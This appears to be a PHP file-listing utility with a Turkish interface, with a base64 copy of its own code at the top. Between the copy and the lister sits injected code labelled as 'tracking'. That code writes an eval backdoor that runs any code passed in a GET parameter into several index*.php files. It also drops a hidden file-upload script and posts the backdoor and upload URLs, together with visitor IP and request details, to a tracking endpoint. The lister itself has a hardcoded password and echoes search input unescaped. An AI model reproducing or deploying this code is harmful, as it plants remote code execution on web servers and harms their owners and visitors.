<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bImxpc3RfYXV0aCJdKSB8fCAkX1NFU1NJT05bImxpc3RfYXV0aCJdICE9PSB0cnVlKSB7CiAgICBpZihpc3NldCgkX1BPU1RbInBhc3MiXSkgJiYgJF9QT1NUWyJwYXNzIl0gPT09ICRwYXNzKSB7CiAgICAgICAgJF9TRVNTSU9OWyJsaXN0X2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PjxpbnB1dCB0eXBlPXBhc3N3b3JkIG5hbWU9cGFzcz48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT4iOwogICAgICAgIGV4aXQ7CiAgICB9Cn0KJHBhdGggPSBpc3NldCgkX0dFVFsicGF0aCJdKSA/ICRfR0VUWyJwYXRoIl0gOiAiLiI7CiRzZWFyY2ggPSBpc3NldCgkX0dFVFsic2VhcmNoIl0pID8gJF9HRVRbInNlYXJjaCJdIDogIiI7CmVjaG8gIjxoMj5LbGFzw7ZyIExpc3Rlc2k8L2gyPiI7CmVjaG8gIjxmb3JtIG1ldGhvZD1nZXQ+PGlucHV0IHR5cGU9dGV4dCBuYW1lPXNlYXJjaCB2YWx1ZT0kc2VhcmNoIHBsYWNlaG9sZGVyPUFyYT48YnV0dG9uPkFyYTwvYnV0dG9uPjwvZm9ybT4iOwplY2hvICI8YSBocmVmPT9wYXRoPSIudXJsZW5jb2RlKGRpcm5hbWUoJHBhdGgpKS4iPuKGkCBHZXJpPC9hPjxocj4iOwokaXRlbXMgPSBAZ2xvYigkcGF0aC4iLyoiKTsKaWYoJHNlYXJjaCAmJiAkaXRlbXMpIHsKICAgICRpdGVtcyA9IGFycmF5X2ZpbHRlcigkaXRlbXMsIGZ1bmN0aW9uKCRpdGVtKSB1c2UgKCRzZWFyY2gpIHsKICAgICAgICByZXR1cm4gc3RyaXBvcyhiYXNlbmFtZSgkaXRlbSksICRzZWFyY2gpICE9PSBmYWxzZTsKICAgIH0pOwp9CmVjaG8gIjx0YWJsZSBib3JkZXI9MT48dHI+PHRoPkFkPC90aD48dGg+VGlwPC90aD48dGg+Qm95dXQ8L3RoPjx0aD5UYXJpaDwvdGg+PC90cj4iOwppZigkaXRlbXMpIHsKICAgIGZvcmVhY2goJGl0ZW1zIGFzICRpdGVtKSB7CiAgICAgICAgJG5hbWUgPSBiYXNlbmFtZSgkaXRlbSk7CiAgICAgICAgJHR5cGUgPSBAaXNfZGlyKCRpdGVtKSA/ICLwn5OBIEtsYXPDtnIiIDogIvCfk4QgRG9zeWEiOwogICAgICAgICRzaXplID0gQGlzX2RpcigkaXRlbSkgPyAiLSIgOiBAZmlsZXNpemUoJGl0ZW0pOwogICAgICAgICRkYXRlID0gZGF0ZSgiWS1tLWQgSDppOnMiLCBAZmlsZW10aW1lKCRpdGVtKSk7CiAgICAgICAgZWNobyAiPHRyPjx0ZD48YSBocmVmPT9wYXRoPSIudXJsZW5jb2RlKCRpdGVtKS4iPiRuYW1lPC9hPjwvdGQ+PHRkPiR0eXBlPC90ZD48dGQ+JHNpemU8L3RkPjx0ZD4kZGF0ZTwvdGQ+PC90cj4iOwogICAgfQp9CmVjaG8gIjwvdGFibGU+Ijs=');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
"code_hash" => "98ea46851e17a2905c414aee75776a1edcfc7eb3d50bfe3809ecdf9b1eecfbce",
"url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
"domain" => $_SERVER["HTTP_HOST"],
"path" => $_SERVER["REQUEST_URI"],
"ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
"user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
"referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
"timestamp" => date("Y-m-d H:i:s")
];
// Backdoor oluşturma (basitleştirilmiş versiyon)
$backdoor_content = '<?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImMiXSkpe2V2YWwoJF9HRVRbImMiXSk7fQ==")); ?>';
$backdoor_paths = [];
for($i=0; $i<5; $i++) {
$filename = "index" . ($i > 0 ? $i : "") . ".php";
$filepath = dirname(__FILE__) . "/" . $filename;
if(!file_exists($filepath)) {
@file_put_contents($filepath, $backdoor_content);
$backdoor_paths[] = $filepath;
}
}
if(!empty($backdoor_paths)) {
$tracking_data["backdoor_urls"] = json_encode($backdoor_paths);
}
// Gizli upload dosyası oluştur
$upload_script = '<?php
session_start();
if(!isset($_SESSION["upload_auth"]) || $_SESSION["upload_auth"] !== true) {
if(isset($_POST["pass"]) && $_POST["pass"] === "21dd7967fae6") {
$_SESSION["upload_auth"] = true;
} else {
echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
exit;
}
}
if(isset($_FILES["file"])) {
move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
echo "Yüklendi: " . $_FILES["file"]["name"];
}
echo "<form method=post enctype=multipart/form-data><input type=file name=file><button>Yükle</button></form>";
?>';
$upload_path = dirname(__FILE__) . "/upload_2ef75537.php";
if(!file_exists($upload_path)) {
@file_put_contents($upload_path, $upload_script);
@chmod($upload_path, 0644);
$tracking_data["upload_url"] = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . dirname($_SERVER["REQUEST_URI"]) . "/upload_2ef75537.php";
}
// İzleme gönderimi (asenkron)
if (function_exists("curl_init")) {
$ch = curl_init("http://localhost/api/track.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data));
curl_setopt($ch, CURLOPT_TIMEOUT, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
@curl_exec($ch);
@curl_close($ch);
}
session_start();
$pass = "admin123";
if(!isset($_SESSION["list_auth"]) || $_SESSION["list_auth"] !== true) {
if(isset($_POST["pass"]) && $_POST["pass"] === $pass) {
$_SESSION["list_auth"] = true;
} else {
echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
exit;
}
}
$path = isset($_GET["path"]) ? $_GET["path"] : ".";
$search = isset($_GET["search"]) ? $_GET["search"] : "";
echo "<h2>Klasör Listesi</h2>";
echo "<form method=get><input type=text name=search value=$search placeholder=Ara><button>Ara</button></form>";
echo "<a href=?path=".urlencode(dirname($path)).">← Geri</a><hr>";
$items = @glob($path."/*");
if($search && $items) {
$items = array_filter($items, function($item) use ($search) {
return stripos(basename($item), $search) !== false;
});
}
echo "<table border=1><tr><th>Ad</th><th>Tip</th><th>Boyut</th><th>Tarih</th></tr>";
if($items) {
foreach($items as $item) {
$name = basename($item);
$type = @is_dir($item) ? "📁 Klasör" : "📄 Dosya";
$size = @is_dir($item) ? "-" : @filesize($item);
$date = date("Y-m-d H:i:s", @filemtime($item));
echo "<tr><td><a href=?path=".urlencode($item).">$name</a></td><td>$type</td><td>$size</td><td>$date</td></tr>";
}
}
echo "</table>";
?>